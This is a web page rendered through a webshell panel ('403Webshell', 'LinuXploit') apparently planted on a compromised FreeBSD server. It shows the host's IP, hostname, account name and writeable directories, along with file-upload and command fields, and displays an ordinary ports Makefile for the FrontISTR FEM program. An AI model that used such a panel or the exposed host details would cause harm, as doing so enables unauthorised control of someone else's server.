403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/science/frontistr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/science/frontistr/Makefile
PORTNAME=	FrontISTR
PORTVERSION=	5.2
DISTVERSIONPREFIX=	v
CATEGORIES=	science cad

MAINTAINER=	thierry@FreeBSD.org
COMMENT=	Large-Scale Parallel FEM Program for Nonlinear Structural Analysis
WWW=		https://gitlab.com/FrontISTR-Commons/FrontISTR

LICENSE=	MIT

LIB_DEPENDS=	libmetis.so:math/metis		\
		libscotch.so:cad/scotch		\
		libcmumps.so.5:math/mumps	\
		libscalapack.so:math/scalapack
TEST_DEPENDS=	bash:shells/bash	\
		gawk:lang/gawk

USE_GITLAB=	yes
GL_ACCOUNT=	${PORTNAME}-Commons
GL_COMMIT=	c66bdc397de319ca59a0565b3f3b1a3b33f0c50c

USES=		blaslapack:openblas cmake:testing fortran mpi shebangfix
SHEBANG_GLOB=	*.sh
FFLAGS+=	-fallow-argument-mismatch
ALL_TARGET=	all

OPTIONS_DEFINE=	DOCS EXAMPLES

DOCS_USES=		python:build
DOCS_BUILD_DEPENDS=	doxygen:devel/doxygen	\
			dot:graphics/graphviz	\
			${PYTHON_PKGNAMEPREFIX}mkdocs>0:textproc/py-mkdocs@${PY_FLAVOR}
DOCS_CMAKE_BOOL=	WITH_DOC
DOCS_ALL_TARGET=	doc

PORTDOCS=	*
PORTEXAMPLES=	*

pre-configure:
	${REINPLACE_CMD} -e 's/awk/gawk/' ${WRKSRC}/tests/test.sh

do-install-DOCS-on:
	${FIND} ${BUILD_WRKSRC}/doc/html -type d -empty -delete
	${MKDIR} ${STAGEDIR}${DOCSDIR}
	cd ${BUILD_WRKSRC}/doc/html && ${COPYTREE_SHARE} . ${STAGEDIR}${DOCSDIR}

do-install-EXAMPLES-on:
	${MKDIR} ${STAGEDIR}${EXAMPLESDIR}
	cd ${WRKSRC}/examples && ${COPYTREE_SHARE} . ${STAGEDIR}${EXAMPLESDIR}

do-test:
	(cd ${TEST_WRKSRC} && ctest)

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit